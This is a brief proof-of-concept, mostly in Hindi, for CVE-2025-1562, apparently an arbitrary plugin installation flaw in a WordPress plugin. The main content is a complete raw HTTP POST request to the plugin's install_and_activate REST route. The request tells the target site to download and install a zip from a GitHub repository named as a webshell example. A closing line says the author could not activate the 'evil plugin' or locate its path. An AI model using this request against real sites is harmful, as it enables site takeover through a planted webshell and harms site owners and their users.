
CVE-2025-1562 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, एक WordPress प्लगइन सक्रियण भेद्यता जो निर्मित REST API अनुरोधों के माध्यम से दूरस्थ कोड निष्पादन की अनुमति देती है।
POST /index.php?rest_route=%2Fautonami-app%2Fplugin%2Finstall_and_activate&bwf-nonce=0f2449cddf9a7d692627071cfdef9ecf HTTP/2
Host: wp.192.168.31.110.nip.io
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: application/json
Content-Type: application/json
Content-Length: 117
{
"action": "install",
"url": "https://github.com/maximo896/webshell-example/raw/refs/heads/main/suffer.zip"
}
प्लगइन को सक्रिय करने की अनुमति नहीं है, सीधे प्लगइन पथ प्राप्त नहीं कर सकते, हमला करना कठिन है unable to activate evil plugin, unable to retrieve the plugin path, difficult to attach